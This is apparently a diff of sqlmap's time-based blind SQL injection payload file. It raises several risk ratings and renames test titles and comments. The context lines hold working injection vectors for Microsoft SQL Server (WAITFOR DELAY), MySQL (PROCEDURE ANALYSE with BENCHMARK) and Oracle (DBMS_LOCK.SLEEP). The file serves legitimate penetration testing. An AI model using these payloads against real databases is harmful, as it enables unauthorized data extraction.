|
207 | 207 | <title>Microsoft SQL Server/Sybase time-based blind</title> |
208 | 208 | <stype>5</stype> |
209 | 209 | <level>1</level> |
210 | | - <risk>0</risk> |
| 210 | + <risk>1</risk> |
211 | 211 | <clause>0</clause> |
212 | 212 | <where>1</where> |
213 | 213 | <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector> |
|
931 | 931 | <!-- TODO: if possible, add payload for Microsoft Access --> |
932 | 932 | <!-- End of OR time-based blind tests --> |
933 | 933 |
|
934 | | - <!-- Time-based tests - After ORDER BY...LIMIT... --> |
| 934 | + <!-- Time-based tests - LIMIT clause --> |
| 935 | + <!-- This payload does not work with SLEEP() --> |
935 | 936 | <test> |
936 | | - <title>MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title> |
| 937 | + <title>MySQL >= 5.1 heavy-query time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)</title> |
937 | 938 | <stype>5</stype> |
938 | 939 | <level>3</level> |
939 | | - <risk>1</risk> |
| 940 | + <risk>2</risk> |
940 | 941 | <clause>1,2,3,4,5</clause> |
941 | 942 | <where>1</where> |
942 | 943 | <vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)</vector> |
|
951 | 952 | <dbms_version>> 5.0.11</dbms_version> |
952 | 953 | </details> |
953 | 954 | </test> |
954 | | - <!-- Time-based tests - After ORDER BY...LIMIT... --> |
| 955 | + <!-- Time-based tests - LIMIT clause --> |
955 | 956 |
|
956 | 957 | <!-- Time-based blind tests - Parameter replace --> |
957 | 958 | <test> |
|
1177 | 1178 | <title>Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)</title> |
1178 | 1179 | <stype>5</stype> |
1179 | 1180 | <level>3</level> |
1180 | | - <risk>0</risk> |
| 1181 | + <risk>1</risk> |
1181 | 1182 | <clause>1,3</clause> |
1182 | 1183 | <where>3</where> |
1183 | 1184 | <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector> |
|
1351 | 1352 | <!-- End of time-based blind tests - Parameter replace --> |
1352 | 1353 |
|
1353 | 1354 |
|
1354 | | - <!-- Time-based blind tests - GROUP BY and ORDER BY clauses --> |
| 1355 | + <!-- Time-based blind tests - GROUP BY and ORDER BY clause --> |
1355 | 1356 | <test> |
1356 | | - <title>MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title> |
| 1357 | + <title>MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clause</title> |
1357 | 1358 | <stype>5</stype> |
1358 | 1359 | <level>3</level> |
1359 | 1360 | <risk>1</risk> |
|
1373 | 1374 | </test> |
1374 | 1375 |
|
1375 | 1376 | <test> |
1376 | | - <title>MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> |
| 1377 | + <title>MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title> |
1377 | 1378 | <stype>5</stype> |
1378 | 1379 | <level>4</level> |
1379 | 1380 | <risk>2</risk> |
|
1392 | 1393 | </test> |
1393 | 1394 |
|
1394 | 1395 | <test> |
1395 | | - <title>PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses</title> |
| 1396 | + <title>PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clause</title> |
1396 | 1397 | <stype>5</stype> |
1397 | 1398 | <level>3</level> |
1398 | 1399 | <risk>1</risk> |
|
1412 | 1413 | </test> |
1413 | 1414 |
|
1414 | 1415 | <test> |
1415 | | - <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> |
| 1416 | + <title>PostgreSQL time-based blind - GROUP BY and ORDER BY clause (heavy query)</title> |
1416 | 1417 | <stype>5</stype> |
1417 | 1418 | <level>4</level> |
1418 | 1419 | <risk>2</risk> |
|
1431 | 1432 | </test> |
1432 | 1433 |
|
1433 | 1434 | <test> |
1434 | | - <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title> |
| 1435 | + <title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause</title> |
1435 | 1436 | <stype>5</stype> |
1436 | 1437 | <level>3</level> |
1437 | 1438 | <risk>1</risk> |
|
1473 | 1474 | </test> |
1474 | 1475 |
|
1475 | 1476 | <test> |
1476 | | - <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)</title> |
| 1477 | + <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_LOCK.SLEEP)</title> |
1477 | 1478 | <stype>5</stype> |
1478 | 1479 | <level>3</level> |
1479 | | - <risk>0</risk> |
| 1480 | + <risk>1</risk> |
1480 | 1481 | <clause>2,3</clause> |
1481 | 1482 | <where>1</where> |
1482 | 1483 | <vector>,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector> |
|
1492 | 1493 | </test> |
1493 | 1494 |
|
1494 | 1495 | <test> |
1495 | | - <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)</title> |
| 1496 | + <title>Oracle time-based blind - GROUP BY and ORDER BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title> |
1496 | 1497 | <stype>5</stype> |
1497 | 1498 | <level>3</level> |
1498 | 1499 | <risk>1</risk> |
|
1511 | 1512 | </test> |
1512 | 1513 |
|
1513 | 1514 | <test> |
1514 | | - <title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> |
| 1515 | + <title>Oracle time-based blind - GROUP BY and ORDER BY clause (heavy query)</title> |
1515 | 1516 | <stype>5</stype> |
1516 | 1517 | <level>4</level> |
1517 | 1518 | <risk>2</risk> |
|
1530 | 1531 | </test> |
1531 | 1532 |
|
1532 | 1533 | <test> |
1533 | | - <title>HSQLDB >= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> |
| 1534 | + <title>HSQLDB >= 1.7.2 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title> |
1534 | 1535 | <stype>5</stype> |
1535 | 1536 | <level>4</level> |
1536 | 1537 | <risk>2</risk> |
|
1551 | 1552 | </test> |
1552 | 1553 |
|
1553 | 1554 | <test> |
1554 | | - <title>HSQLDB > 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title> |
| 1555 | + <title>HSQLDB > 2.0 time-based blind - GROUP BY and ORDER BY clause (heavy query)</title> |
1555 | 1556 | <stype>5</stype> |
1556 | 1557 | <level>4</level> |
1557 | 1558 | <risk>2</risk> |
|
0 commit comments